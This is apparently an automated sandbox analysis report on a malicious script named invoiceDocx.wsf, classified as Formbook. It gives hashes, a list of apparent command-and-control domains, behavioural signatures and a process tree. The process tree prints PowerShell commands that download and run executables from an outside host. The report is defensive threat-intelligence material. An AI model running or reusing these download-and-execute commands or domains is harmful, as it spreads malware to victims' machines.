Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2022 08:43
Static task
static1
Behavioral task
behavioral1
Sample
invoiceDocx.wsf
Resource
win7-20220812-en
General
-
Target
invoiceDocx.wsf
-
Size
617B
-
MD5
48a775e6dd5d96edafaeac7d785c8d64
-
SHA1
054eb3ce87682d131b95a22741bcca35b1e1d5d1
-
SHA256
20ca052bc52642c405973b7085edbb40b22aa28d7e781dddc43760097ea58722
-
SHA512
bb6eac05b3a1fdc9b169bb8a71f44e2fafa4a95367cf07952776aa781baec46a2f231ccc3c06823aaa1f960ce18e9f0d323b3c1f54cf0d6bca3d9f6e1d857379
Malware Config
Extracted
formbook
4.1
je14
innervisionbuildings.com
theenergysocialite.com
565548.com
panghr.com
onlyonesolutions.com
stjohnzone6.com
cnotes.rest
helfeb.online
xixi-s-inc.club
easilyentered.com
theshopx.store
mrclean-ac.com
miamibeachwateradventures.com
jpearce.co.uk
seseragi-bunkou.com
minimaddie.com
commbank-help-849c3.com
segohandelsonderneming.com
namthanhreal.com
fototerapi.online
your-download.com
klindt.one
sellerscourt.com
francoislambert.store
smokedoutvapes.co.uk
rundacg.com
flavors-and-spices-lyon.com
qifengsuo.com
sunnyislesgardens.com
tunneldutransit.com
restorecodes.website
blast4me.com
bingser.space
co-gpco.com
emporioaliwen.com
mr5g.com
abcp666.com
consulvip.net
sagaming168.info
zjpbhsuz.top
socal-labworx.com
arethaglennevents.com
rafiqsiregar.com
esgh2.com
veirdmusic.com
abzcc.xyz
8065yp.com
dronebazar.com
duetpbr.com
apartamentoslaencantada.com
digigold.info
homedecorsuppliers.com
duenorthrm.com
xmmdsy.com
ddstennessee.com
marmeluz.com
ragnallhess.com
methinelli.com
randomlymetheseer.com
magicgrowthproducts.com
shreejistudio.com
mattress-37684.com
yellyfishfilms.com
www1111cpw.com
tigermedlagroup.com
Signatures
-
Formbook payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3744-163-0x0000000000130000-0x000000000015F000-memory.dmp formbook behavioral2/memory/3744-167-0x0000000000130000-0x000000000015F000-memory.dmp formbook -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 6 3780 powershell.exe 13 4812 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
system32.exevpxpxta.exevpxpxta.exepid process 1348 system32.exe 2920 vpxpxta.exe 4300 vpxpxta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
vpxpxta.exevpxpxta.exewlanext.exedescription pid process target process PID 2920 set thread context of 4300 2920 vpxpxta.exe vpxpxta.exe PID 4300 set thread context of 792 4300 vpxpxta.exe Explorer.EXE PID 4300 set thread context of 792 4300 vpxpxta.exe Explorer.EXE PID 3744 set thread context of 792 3744 wlanext.exe Explorer.EXE PID 3744 set thread context of 2112 3744 wlanext.exe NOTEPAD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\system32.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\system32.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\system32.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\system32.exe nsis_installer_2 -
Modifies registry class 3 IoCs
Processes:
WScript.exeOpenWith.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2112 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
powershell.exepowershell.exevpxpxta.exewlanext.exepid process 3780 powershell.exe 3780 powershell.exe 4812 powershell.exe 4812 powershell.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
Processes:
vpxpxta.exevpxpxta.exewlanext.exepid process 2920 vpxpxta.exe 2920 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 4300 vpxpxta.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe 3744 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exepowershell.exevpxpxta.exewlanext.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 4300 vpxpxta.exe Token: SeDebugPrivilege 3744 wlanext.exe Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE Token: SeShutdownPrivilege 792 Explorer.EXE Token: SeCreatePagefilePrivilege 792 Explorer.EXE -
Suspicious use of SetWindowsHookEx 23 IoCs
Processes:
OpenWith.exepid process 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe 3916 OpenWith.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
WScript.execmd.execmd.exesystem32.exevpxpxta.exevpxpxta.exewlanext.exeOpenWith.exedescription pid process target process PID 1724 wrote to memory of 2872 1724 WScript.exe cmd.exe PID 1724 wrote to memory of 2872 1724 WScript.exe cmd.exe PID 2872 wrote to memory of 3780 2872 cmd.exe powershell.exe PID 2872 wrote to memory of 3780 2872 cmd.exe powershell.exe PID 1724 wrote to memory of 1612 1724 WScript.exe cmd.exe PID 1724 wrote to memory of 1612 1724 WScript.exe cmd.exe PID 1612 wrote to memory of 4812 1612 cmd.exe powershell.exe PID 1612 wrote to memory of 4812 1612 cmd.exe powershell.exe PID 1724 wrote to memory of 1348 1724 WScript.exe system32.exe PID 1724 wrote to memory of 1348 1724 WScript.exe system32.exe PID 1724 wrote to memory of 1348 1724 WScript.exe system32.exe PID 1348 wrote to memory of 2920 1348 system32.exe vpxpxta.exe PID 1348 wrote to memory of 2920 1348 system32.exe vpxpxta.exe PID 1348 wrote to memory of 2920 1348 system32.exe vpxpxta.exe PID 2920 wrote to memory of 4300 2920 vpxpxta.exe vpxpxta.exe PID 2920 wrote to memory of 4300 2920 vpxpxta.exe vpxpxta.exe PID 2920 wrote to memory of 4300 2920 vpxpxta.exe vpxpxta.exe PID 2920 wrote to memory of 4300 2920 vpxpxta.exe vpxpxta.exe PID 4300 wrote to memory of 3744 4300 vpxpxta.exe wlanext.exe PID 4300 wrote to memory of 3744 4300 vpxpxta.exe wlanext.exe PID 4300 wrote to memory of 3744 4300 vpxpxta.exe wlanext.exe PID 3744 wrote to memory of 2360 3744 wlanext.exe cmd.exe PID 3744 wrote to memory of 2360 3744 wlanext.exe cmd.exe PID 3744 wrote to memory of 2360 3744 wlanext.exe cmd.exe PID 3916 wrote to memory of 2112 3916 OpenWith.exe NOTEPAD.EXE PID 3916 wrote to memory of 2112 3916 OpenWith.exe NOTEPAD.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoiceDocx.wsf"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/INVESTMENT.one -OutFile $env:tmp\invoice.one; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\invoice.one3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/INVESTMENT.one -OutFile $env:tmp\invoice.one; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\invoice.one4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/DT6832.exe -OutFile $env:tmp\system32.exe; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\system32.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/DT6832.exe -OutFile $env:tmp\system32.exe; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\system32.exe4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\system32.exe"C:\Users\Admin\AppData\Local\Temp\system32.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vpxpxta.exe"C:\Users\Admin\AppData\Local\Temp\vpxpxta.exe" C:\Users\Admin\AppData\Local\Temp\rdsdqatpbhs.z4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vpxpxta.exe"C:\Users\Admin\AppData\Local\Temp\vpxpxta.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\vpxpxta.exe"7⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\invoice.one2⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD558b97594c4d764d5d99a459fbee0fd33
SHA14d1f8f4f5bbf87a6ea3ae7b7be623542377365da
SHA2568001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2
SHA512874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7
-
C:\Users\Admin\AppData\Local\Temp\gvffc.ytuFilesize
185KB
MD50259fde3e396b0abdf865d2227a3e1b6
SHA1d9d03d8050e968b192bb1fc112fe28d53df4bded
SHA256ca6c0d21f3ea9f6a8c67f0ba534ab394fd05b3ecfa6576428cea4ce42adb6861
SHA5128ba17292d2fb3a0324e49bd5c490c3a2139c7079290399709582131d26d061f1eaddb5c8e5363bf79797bf55e34f791b3c0c7eb64eb3756fc8bdd00e79c3dd9c
-
C:\Users\Admin\AppData\Local\Temp\invoice.oneFilesize
58KB
MD5ae1e2124eb7dab1d2c4d5619f4b9c9ee
SHA133d8fb75f471bdc4ebaff053e87146721f32667a
SHA2563f57b5add3a07d96e9dbdedbc6914b1ed8d41cdc66eb4cb747020302b02aa498
SHA512f7f2c7597416688e1b13bea3647c0bd3a9efa1eca3e0b364aa67734aa2cea5ee97bc4c8914952e28d886ef9f9edc7294c268741f772c1c850074e35065b755fe
-
C:\Users\Admin\AppData\Local\Temp\rdsdqatpbhs.zFilesize
6KB
MD5b34b9ffd1150f121d29fcd48c89d7de4
SHA1fe76263983ef50bb1f46c44e3ee1d85c87cb56d9
SHA256ecc775d058ed2b1f6746748a3e28e3117188225e3c63766250e3b4287c6fe538
SHA512a820cf2892b3569af35477f2bd26d7e44121f165214ca9dec9de0d26e8831751f04e57d3409e9cdfb3dc81b1c2b21072b0c8a73caa4fa2a24fd53c324054e476
-
C:\Users\Admin\AppData\Local\Temp\system32.exeFilesize
213KB
MD5ace23ae0a5524989a50081e0416cd06f
SHA1d5ee9183be486bf153d7666ca4301e600ea06087
SHA25632398cba360318425a3f1ba57676cba07546d5419e4d5f041752273ea389da33
SHA5129ae64c7e067d123357887951cbb4e5dfa1876a4a8febb41f6e9065e9c0cf0aaf68f4c0a449fe89ec46d51a807c545609b005bdbe4efdc34128a1c1de2287ed4f
-
C:\Users\Admin\AppData\Local\Temp\system32.exeFilesize
213KB
MD5ace23ae0a5524989a50081e0416cd06f
SHA1d5ee9183be486bf153d7666ca4301e600ea06087
SHA25632398cba360318425a3f1ba57676cba07546d5419e4d5f041752273ea389da33
SHA5129ae64c7e067d123357887951cbb4e5dfa1876a4a8febb41f6e9065e9c0cf0aaf68f4c0a449fe89ec46d51a807c545609b005bdbe4efdc34128a1c1de2287ed4f
-
C:\Users\Admin\AppData\Local\Temp\vpxpxta.exeFilesize
12KB
MD5d5a51803072a4fc064ba840fa97b052c
SHA129b163435bb0e4d7e7532108af9fdf2d346ad204
SHA25652f984ff112c1b873209cacafecf5e774bb4100083a9049e741b93baaa63b75b
SHA512c9f15cefd8a002dbba8a1cf80299b227e82a867824346739521ca1d671908842f29aa837b8da01e7c42a11af39597a8969a055a0ef87076ca1dccfea82f8da73
-
C:\Users\Admin\AppData\Local\Temp\vpxpxta.exeFilesize
12KB
MD5d5a51803072a4fc064ba840fa97b052c
SHA129b163435bb0e4d7e7532108af9fdf2d346ad204
SHA25652f984ff112c1b873209cacafecf5e774bb4100083a9049e741b93baaa63b75b
SHA512c9f15cefd8a002dbba8a1cf80299b227e82a867824346739521ca1d671908842f29aa837b8da01e7c42a11af39597a8969a055a0ef87076ca1dccfea82f8da73
-
C:\Users\Admin\AppData\Local\Temp\vpxpxta.exeFilesize
12KB
MD5d5a51803072a4fc064ba840fa97b052c
SHA129b163435bb0e4d7e7532108af9fdf2d346ad204
SHA25652f984ff112c1b873209cacafecf5e774bb4100083a9049e741b93baaa63b75b
SHA512c9f15cefd8a002dbba8a1cf80299b227e82a867824346739521ca1d671908842f29aa837b8da01e7c42a11af39597a8969a055a0ef87076ca1dccfea82f8da73
-
memory/792-168-0x0000000002E00000-0x0000000002F39000-memory.dmpFilesize
1.2MB
-
memory/792-166-0x0000000002E00000-0x0000000002F39000-memory.dmpFilesize
1.2MB
-
memory/792-158-0x00000000086C0000-0x0000000008806000-memory.dmpFilesize
1.3MB
-
memory/792-156-0x0000000002D40000-0x0000000002DFB000-memory.dmpFilesize
748KB
-
memory/1348-145-0x0000000000000000-mapping.dmp
-
memory/1612-138-0x0000000000000000-mapping.dmp
-
memory/2112-164-0x0000000000000000-mapping.dmp
-
memory/2360-160-0x0000000000000000-mapping.dmp
-
memory/2872-132-0x0000000000000000-mapping.dmp
-
memory/2920-147-0x0000000000000000-mapping.dmp
-
memory/3744-167-0x0000000000130000-0x000000000015F000-memory.dmpFilesize
188KB
-
memory/3744-162-0x0000000000C10000-0x0000000000F5A000-memory.dmpFilesize
3.3MB
-
memory/3744-165-0x0000000000840000-0x00000000008D3000-memory.dmpFilesize
588KB
-
memory/3744-163-0x0000000000130000-0x000000000015F000-memory.dmpFilesize
188KB
-
memory/3744-159-0x0000000000000000-mapping.dmp
-
memory/3744-161-0x0000000000780000-0x0000000000797000-memory.dmpFilesize
92KB
-
memory/3780-133-0x0000000000000000-mapping.dmp
-
memory/3780-134-0x00000281E4760000-0x00000281E4782000-memory.dmpFilesize
136KB
-
memory/3780-135-0x00007FF8A18E0000-0x00007FF8A23A1000-memory.dmpFilesize
10.8MB
-
memory/3780-136-0x00007FF8A18E0000-0x00007FF8A23A1000-memory.dmpFilesize
10.8MB
-
memory/4300-152-0x0000000000000000-mapping.dmp
-
memory/4300-157-0x0000000000DB0000-0x0000000000DC4000-memory.dmpFilesize
80KB
-
memory/4300-155-0x0000000000D30000-0x0000000000D44000-memory.dmpFilesize
80KB
-
memory/4300-154-0x0000000000FB0000-0x00000000012FA000-memory.dmpFilesize
3.3MB
-
memory/4812-139-0x0000000000000000-mapping.dmp
-
memory/4812-142-0x00007FF8A1620000-0x00007FF8A20E1000-memory.dmpFilesize
10.8MB
-
memory/4812-143-0x00007FF8A1620000-0x00007FF8A20E1000-memory.dmpFilesize
10.8MB